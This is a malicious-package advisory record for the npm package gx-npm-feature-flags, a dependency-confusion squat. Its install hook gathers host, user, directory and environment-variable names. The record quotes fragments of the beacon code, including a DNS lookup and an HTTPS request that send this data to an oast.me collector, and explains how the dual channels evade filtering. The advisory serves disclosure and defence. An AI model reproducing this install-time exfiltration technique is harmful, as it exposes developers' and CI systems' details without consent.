MAL-2026-6466

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7) gx-npm-feature-flags@99.99.99 is a dependency-confusion squat (max-semver `99.99.99` on a `gx-`-prefixed name to outrank a private internal package) that runs an exfiltration beacon at install time. `package.json` declares `postinstall: node beacon.js`. beacon.js collects the installer's OS hostname (`os.hostname()`), OS user (`os.userInfo()` / `process.env.USER`), current working directory (`process.cwd()`), package name, Node version, and the first 80 environment-variable names (`process.env`), then exfiltrates via two channels to a hardcoded `*.oast.me` endpoint: (1) a DNS lookup encoding pkg/host/user as subdomain labels (`dns.lookup('<pkg>.<host>.<user>.d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me')`), and (2) an HTTPS GET to the same host with a base64-encoded JSON blob in the query string (`path: '/'+pkg+'?d='+base64(JSON({pkg,host,user,cwd,env_names,node}))`). The base64 wrapping obscures the payload from proxy logs; the dual DNS+HTTPS channels are designed to bypass egress filtering. The package README self-labels as 'authorized security research / Bugcrowd dependency-confusion PoC' — that framing does not consent any third party who installs the package; their CI/build identifiers leave to a third-party collector regardless of the author's stated intent.

## Source: ossf-package-analysis (b1c95e5e4a2cb9afebf67c805d5a74c5aba0ebedd5ed011f65dc6406b6a693cd) The OpenSSF Package Analysis project identified 'gx-npm-feature-flags' @ 99.99.99 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.